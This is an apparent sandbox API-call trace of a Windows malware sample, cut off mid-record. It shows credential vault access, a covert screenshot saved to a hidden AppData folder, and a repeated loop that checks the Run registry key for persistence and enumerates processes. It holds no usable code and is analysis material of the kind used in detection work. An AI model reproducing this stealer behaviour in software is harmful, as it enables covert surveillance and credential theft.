VaultCloseVault () returned 0x0 [0280.521] VaultFree () returned 0x1 [0280.523] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="gdiplus.dll", BaseAddress=0xde61c | out: BaseAddress=0xde61c*=0x6c600000) returned 0x0 [0281.193] GetDC (hWnd=0x0) returned 0xe0106d3 [0281.193] CreateCompatibleDC (hdc=0xe0106d3) returned 0x440107cd [0281.193] GetSystemMetrics (nIndex=0) returned 1440 [0281.193] GetSystemMetrics (nIndex=1) returned 900 [0281.193] CreateCompatibleBitmap (hdc=0xe0106d3, cx=1440, cy=900) returned 0x41050964 [0281.246] SelectObject (hdc=0x440107cd, h=0x41050964) returned 0x185000f [0281.246] BitBlt (hdc=0x440107cd, x=0, y=0, cx=1440, cy=900, hdcSrc=0xe0106d3, x1=0, y1=0, rop=0xcc0020) returned 1 [0281.624] GdiplusStartup (in: token=0xde9f0, input=0xde9bc, output=0x0 | out: token=0xde9f0, output=0x0) returned 0x0 [0281.634] GdipCreateBitmapFromHBITMAP (hbm=0x41050964, hpal=0x0, bitmap=0xde9ec) returned 0x0 [0281.759] GdipGetImageEncodersSize (numEncoders=0xde688, size=0xde684) returned 0x0 [0281.761] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x410) returned 0x59d1f8 [0281.761] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x59d1f8 | out: encoders=0x59d1f8) returned 0x0 [0281.762] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x59d1f8) returned 1 [0281.762] GdipSaveImageToFile (image=0x77b1f08, filename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", clsidEncoder=0xde9ac*(Data1=0x557cf401, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0282.115] GdiplusShutdown (token=0x141f1c9) [0282.166] DeleteObject (ho=0x41050964) returned 1 [0282.166] DeleteObject (ho=0x440107cd) returned 1 [0282.166] ReleaseDC (hWnd=0x0, hDC=0xe0106d3) returned 1 [0282.174] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0282.174] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0282.174] NtClose (Handle=0x338) returned 0x0 [0282.175] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0282.175] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0282.175] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0282.175] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0282.176] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0282.176] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0282.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0282.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0282.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0282.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0282.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0282.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.429] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0282.431] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0282.432] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0282.432] NtClose (Handle=0x338) returned 0x0 [0282.432] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0282.432] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0282.433] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0282.433] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0282.433] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0282.433] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0282.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0282.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0282.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0282.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0282.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0282.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.618] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0282.620] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0282.621] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0282.622] NtClose (Handle=0x338) returned 0x0 [0282.622] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0282.622] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0282.622] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0282.622] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0282.622] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0282.622] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0282.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0282.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0282.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0282.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0282.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0282.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.839] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0282.841] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0282.843] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0282.843] NtClose (Handle=0x338) returned 0x0 [0282.843] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0282.843] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0282.843] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0282.843] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0282.843] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0282.844] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0282.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0282.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0282.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0282.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0282.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0282.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.986] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0282.987] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0282.989] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0282.989] NtClose (Handle=0x338) returned 0x0 [0282.989] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0282.989] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0282.989] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0282.989] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0282.989] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0282.989] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0282.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0282.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0282.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0282.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0282.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0283.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.163] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0283.165] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0283.166] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0283.166] NtClose (Handle=0x338) returned 0x0 [0283.166] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.166] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.166] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0283.166] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.166] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.167] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de4a0) returned 1 [0283.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0283.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0283.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0283.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0283.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0283.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.277] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0283.279] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, 